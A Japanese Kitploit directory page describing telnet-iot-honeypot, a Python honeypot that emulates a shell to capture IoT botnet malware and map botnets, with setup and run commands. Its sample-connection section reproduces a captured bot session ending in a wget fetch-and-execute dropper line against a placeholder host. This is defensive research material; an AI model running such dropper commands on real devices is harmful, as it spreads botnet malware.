Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
telnet-iot-honeypot — Python製telnetハニーポット:ボットネットのバイナリを捕捉するため | Kitploit
ツール/GitHubGitHub/phype/telnet-iot-honeypot
IoTセキュリティネットワークセキュリティマルウェア分析脅威インテリジェンス
GitHubphype/telnet-iot-honeypot

telnet-iot-honeypot

Python製telnetハニーポット:ボットネットのバイナリを捕捉するため

リポジトリを見る
314844年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

免責事項

このプロジェクトはもうサポートも開発もされていません。Python2に基づいており、2020年にEOLに達し、時間とともにインストールが困難になる依存関係を使用しています。自己責任で使用してください!

Telnet IoT ハニーポット

'ボットネットのバイナリを捕獲するためのPython telnetハニーポット'

このプロジェクトは、インターネット上のtelnetサーバーで恐ろしく安全でないデフォルトパスワードを介して拡散するIoTマルウェアのハニーポットとして機能するPython telnetサーバーを実装しています。

ハニーポットは、Cowrie (https://github.com/micheloosterhof/cowrie) と同様にシェル環境をエミュレートすることで動作します。このプロジェクトの主な目的は、ボットネット接続を自動的に分析し、異なる接続やネットワークをリンクさせることでボットネットを「マッピング」することです。

アーキテクチャ

アプリケーションはクライアント/サーバーアーキテクチャを持ち、クライアント(実際のハニーポット)はtelnet接続を受け入れ、サーバーは接続に関する情報を受信し分析を行います。

バックエンドサーバーはHTTPインターフェースを公開しており、フロントエンドへのアクセスや、クライアントが新しい接続情報をバックエンドにプッシュするために使用されます。

自動分析

バックエンドは、接続を自動的にリンクするために2つの異なるメカニズムを使用します。

ネットワーク

ネットワークは発見されたボットネットです。ネットワークは、リンクされたすべての接続、URL、サンプルの集合です。URLとサンプルは、接続で使用されたときにリンクされます。2つの接続は、両方の接続が同じハニーポットクライアント(複数のクライアントがサポートされています!)によって受信され、短い期間(デフォルト2分)内に同じ資格情報を使用する場合、または同じIPアドレスからのものである場合にリンクされます。

マルウェア

複数のネットワークが、セッション中に入力されたテキストがほとんど同じである場合、同じタイプのマルウェアを使用していると識別されます。この比較は、セッション(または接続)を基本的に単語のシーケンスに変換し、各単語を1バイトにマッピングして、その結果のバイトシーケンスを簡単に検索できるようにする、一種の「ハッシュ」関数を使用して行われます。

実行

アプリケーションには config.py という設定ファイルがあります。ローカルおよびクライアント/サーバーデプロイメント用のサンプルが含まれています。

設定

バックエンドは、初回実行時に初期化されるSQLデータベース(デフォルトではsqlite)を必要とします。初回実行前に、さらにユーザーを生成するために使用する管理者アカウントを生成する必要があります。管理者アカウントは、クライアントが接続を投稿するためにも直接使用できます。複数のハニーポットを接続する場合は、複数のユーザーを作成することをお勧めします。

root@kitploit:~
bash create_config.sh

クライアントとバックエンドの両方が、config.yaml および config.dist.yaml ファイルを読み取って設定パラメータを読み込みます。config.dist.yaml ファイルには、管理者ユーザー資格情報以外のすべてのデフォルト値が含まれており、これらのパラメータは config.yaml ファイルのエントリによって上書きされます。

サーバーの実行

root@kitploit:~
python backend.py

クライアントの実行

このプロジェクトには独自のハニーポットが含まれていますが、クライアント/サーバーアーキテクチャのため、他のハニーポットも使用できます。

内蔵ハニーポットの使用

root@kitploit:~
python honeypot.py

サーバーが実行されていないとクライアントは起動できません。クライアントに異なる設定を使用するには、次のように -c スイッチを使用します。

root@kitploit:~
python honeypot.py -c myconfig.yaml

ハニーポットの機能だけを確認したい場合は、対話モードでクライアントを起動できます。

root@kitploit:~
python honeypot shell

Cowrieの使用

組み込みのハニーポットよりもはるかに多くの機能を持つCowrie用の出力プラグインを作成しました。Cowrieを使用したい場合は、出力モジュールを含む私のフォークをこちらで確認してください: https://github.com/Phype/cowrie .

フロントエンドを開く

サーバーが起動したら、お好みのブラウザで http://127.0.0.1/ を開いてください。

サンプル接続

root@kitploit:~
enable
shell
sh
cat /proc/mounts; /bin/busybox PEGOK
cd /tmp; (cat .s || cp /bin/echo .s); /bin/busybox PEGOK
nc; wget; /bin/busybox PEGOK
(dd bs=52 count=1 if=.s || cat .s)
/bin/busybox PEGOK
rm .s; wget http://example.com:4636/.i; chmod +x .i; ./.i; exit

画像

スクリーンショット1

スクリーンショット2

スクリーンショット3

ツールをダウンロード